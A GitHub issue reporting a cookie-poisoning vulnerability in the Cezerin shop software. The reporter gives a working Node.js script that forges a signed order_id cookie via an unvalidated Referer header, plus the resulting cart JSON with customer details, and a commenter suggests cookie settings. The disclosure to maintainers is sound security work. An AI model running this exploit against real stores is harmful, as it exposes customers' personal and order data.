Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[VULNERABILITY]: Cookie poisoning #499

Open
Baker68 opened this issue Jun 27, 2022 · 1 comment
Open

[VULNERABILITY]: Cookie poisoning #499

Baker68 opened this issue Jun 27, 2022 · 1 comment
Assignees
@ValerioBob
Labels
bug Something isn't working

Comments

@Baker68
Copy link

Baker68 commented Jun 27, 2022

When a customer visits Cezerin, two signed cookies are set : landing_url and referrer_url.
The referrer_url cookie is set (signed) with the value of the Referer header but its missing validation, so any value will be set.

script :

const axios = require("axios");
// 62b9728e9352df6441630054

let config = {
    headers: {
        'Host': 'plusha.cezerin.net',
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': process.argv[2],
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache'
    }
};
(async () => {
    await axios.get('https://plusha.cezerin.net/',  config)
        .then(data => console.log(`success : order_id=${data.headers['set-cookie'][0].split('=')[1].split(';')[0]}` ));
})();

save the above file as cookie.js and execute it like so : node cookie.js 62b9728e9352df6441630054
The script will output something like this :

success : order_id=s%3A62b9728e9352df6441630054.x%2FwysOvDVq9nNwXO4N3tFmZpki7lvEHMgqtNAkAoTuw

Now that we have a valid signed order_id cookie, if we import that cookie in the browser , we will get access to the customers cart , with all its details and you can also perform an attack on the objectId , listing carts that contain customer data ;

sample output on GET https://plusha.cezerin.net/ajax/cart

{
   "date_created":"2022-06-27T09:04:14.558Z",
   "date_placed":null,
   "date_updated":"2022-06-27T09:05:31.311Z",
   "date_closed":null,
   "date_paid":null,
   "date_cancelled":null,
   "number":1002,
   "shipping_status":"",
   "items":[
      {
         "product_image":[
            {
               "id":"5e1653f2f60c02051954ed72",
               "alt":"",
               "position":99,
               "filename":"cezerin.png",
               "url":"https://cezerin.net/images/products/5e1639ae0c86ec14224a4645/cezerin.png"
            }
         ],
         "id":"62b9728e9352df6441630055",
         "product_id":"5e1639ae0c86ec14224a4645",
         "variant_id":null,
         "quantity":2,
         "discount_total":0,
         "name":"Product A",
         "price":850,
         "price_total":1700,
         "sku":"product-a",
         "tax_class":null,
         "tax_total":0,
         "variant_name":"",
         "weight":0.5,
         "image_url":"https://cezerin.net/images/products/5e1639ae0c86ec14224a4645/cezerin.png",
         "path":"/category-a/product-a",
         "stock_quantity":10000
      }
   ],
   "transactions":[
      
   ],
   "discounts":[
      
   ],
   "billing_address":{
      "full_name":"",
      "address1":"",
      "address2":"",
      "city":"",
      "country":"",
      "postal_code":"",
      "state":"",
      "phone":"",
      "company":"",
      "tax_number":"",
      "coordinates":{
         "latitude":"",
         "longitude":""
      },
      "details":null
   },
   "shipping_address":{
      "full_name":"backer 68 ",
      "address1":"",
      "address2":"",
      "city":"",
      "country":"",
      "postal_code":"",
      "state":"",
      "phone":"",
      "company":"",
      "tax_number":"",
      "coordinates":{
         "latitude":"",
         "longitude":""
      },
      "details":null
   },
   "tax_rate":0,
   "shipping_tax":0,
   "shipping_discount":0,
   "shipping_price":0,
   "item_tax_included":true,
   "shipping_tax_included":true,
   "closed":false,
   "cancelled":false,
   "delivered":false,
   "paid":false,
   "hold":false,
   "draft":true,
   "first_name":"backer 68",
   "last_name":"",
   "password":"",
   "email":"baker68@email-test.com",
   "mobile":"+5 (555) 555-5555",
   "referrer_url":"https://cezerin.org/",
   "landing_url":"https://plusha.cezerin.net/",
   "channel":"",
   "note":"",
   "comments":"",
   "coupon":"",
   "tracking_number":"",
   "customer_id":null,
   "status_id":null,
   "payment_method_id":null,
   "shipping_method_id":"5e1639ae0c86ec14224a464e",
   "tags":[
      
   ],
   "id":"62b9728e9352df6441630054",
   "status":"",
   "shipping_method":"Courier",
   "payment_method":"",
   "payment_method_gateway":"",
   "weight_total":1,
   "discount_total":0,
   "subtotal":1700,
   "tax_included_total":0,
   "tax_total":0,
   "shipping_total":0,
   "grand_total":1700
}

The referrer_url value should be validated before being set.
@Baker68 Baker68 added the bug Something isn't working label Jun 27, 2022
@ekarailiev
Copy link

I think in Cezerin2/src/api/server/ajaxRouter.ts

// maxAge: number hier comment for Session
httpOnly: true
signed: true
secure: boolean
sameSite: "lax" hier Lax

and

// maxAge: 24 * 60 * 60 * 1000, // 24 hours hier comment for Session
httpOnly: true,
signed: true,
secure: true, hier for Secure
sameSite: "lax", hier Lax

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@ValerioBob ValerioBob

Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@ekarailiev @Baker68 @ValerioBob